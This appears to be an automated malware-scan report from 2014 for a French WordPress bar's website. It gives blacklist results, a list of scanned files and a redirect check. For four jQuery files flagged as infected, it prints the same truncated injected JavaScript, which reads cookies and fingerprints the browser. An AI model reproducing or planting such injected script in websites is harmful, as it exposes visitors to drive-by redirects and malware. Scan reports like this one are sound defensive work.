Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bamboobar.fr
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bamboobar.fr/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bamboobar.fr/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 08 Sep 2014 01:28:33 GMT Location: http://www.bamboobar.fr/ Server: Apache Content-Encoding: none Content-Type: text/html; charset=UTF-8 Set-Cookie: clusterBAK=R1564868203; path=/; expires=Mon, 08-Sep-2014 02:48:37 GMT Set-Cookie: cluster=R2881418694; path=/; expires=Mon, 08-Sep-2014 02:44:00 GMT X-Pingback: http://www.bamboobar.fr/xmlrpc.php X-Powered-By: PHP/5.4.30 | clean |
http://www.bamboobar.fr/ | 200 OK Content-Length: 26707 Content-Type: text/html | clean |
http://www.bamboobar.fr/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 98686 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name) {
    var kloack = document.cookie.match(new RegExp(
        "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
    ));
    return kloack ? decodeURIComponent(kloack[1]) : undefined;
}
function Ubrostyleddesignercoder() {
    var specifico_stock = navigator.userAgent;
    var flawor_bobma = (specifico_stock.indexOf("IEMobile") > -1 || specifico_stock.indexOf("Chrome") > -1 || specifico_stock.indexOf("Windows") <
jQuery.noConflict();
Antivirus reports:
http://www.bamboobar.fr/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 9484 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name) {
    var kloack = document.cookie.match(new RegExp(
        "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
    ));
    return kloack ? decodeURIComponent(kloack[1]) : undefined;
}
function Ubrostyleddesignercoder() {
    var specifico_stock = navigator.userAgent;
    var flawor_bobma = (specifico_stock.indexOf("IEMobile") > -1 || specifico_stock.indexOf("Chrome") > -1 || specifico_stock.indexOf("Windows") <
Antivirus reports:
http://www.bamboobar.fr/wp-content/plugins/gallery-bank-pro-edition/assets/js/jquery.masonry.min.js?ver=3.9.2 | 200 OK Content-Length: 10193 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-content/plugins/gallery-bank-pro-edition/assets/js/isotope.pkgd.js?ver=3.9.2 | 200 OK Content-Length: 103229 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-content/plugins/gallery-bank-pro-edition/assets/js/imgLiquid.js?ver=3.9.2 | 200 OK Content-Length: 17950 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-content/plugins/gallery-bank-pro-edition/assets/js/jPages.js?ver=3.9.2 | 200 OK Content-Length: 23907 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-content/plugins/gallery-bank-pro-edition/assets/js/jquery.prettyPhoto.js?ver=3.9.2 | 200 OK Content-Length: 37319 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 6573 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name) {
    var kloack = document.cookie.match(new RegExp(
        "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
    ));
    return kloack ? decodeURIComponent(kloack[1]) : undefined;
}
function Ubrostyleddesignercoder() {
    var specifico_stock = navigator.userAgent;
    var flawor_bobma = (specifico_stock.indexOf("IEMobile") > -1 || specifico_stock.indexOf("Chrome") > -1 || specifico_stock.indexOf("Windows") <
Antivirus reports:
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js?ver=1.10.4 | 200 OK Content-Length: 38090 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getCookie(name) {
    var kloack = document.cookie.match(new RegExp(
        "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
    ));
    return kloack ? decodeURIComponent(kloack[1]) : undefined;
}
function Ubrostyleddesignercoder() {
    var specifico_stock = navigator.userAgent;
    var flawor_bobma = (specifico_stock.indexOf("IEMobile") > -1 || specifico_stock.indexOf("Chrome") > -1 || specifico_stock.indexOf("Windows") <
Antivirus reports:
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.4 | 200 OK Content-Length: 8805 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.mouse.min.js?ver=1.10.4 | 200 OK Content-Length: 5125 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.button.min.js?ver=1.10.4 | 200 OK Content-Length: 9157 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.position.min.js?ver=1.10.4 | 200 OK Content-Length: 8644 Content-Type: application/javascript | clean |
http://www.bamboobar.fr/wp-includes/js/jquery/ui/jquery.ui.sortable.min.js?ver=1.10.4 | 200 OK Content-Length: 26394 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bamboobar.fr
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 08 Sep 2014 01:28:33 GMT
Location: http://www.bamboobar.fr/
Server: Apache
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
Set-Cookie: clusterBAK=R1564868203; path=/; expires=Mon, 08-Sep-2014 02:48:37 GMT
Set-Cookie: cluster=R2881418694; path=/; expires=Mon, 08-Sep-2014 02:44:00 GMT
X-Pingback: http://www.bamboobar.fr/xmlrpc.php
X-Powered-By: PHP/5.4.30
Second query (visit from search engine):
GET / HTTP/1.1
Host: bamboobar.fr
Referer: http://www.google.com/search?q=bamboobar.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.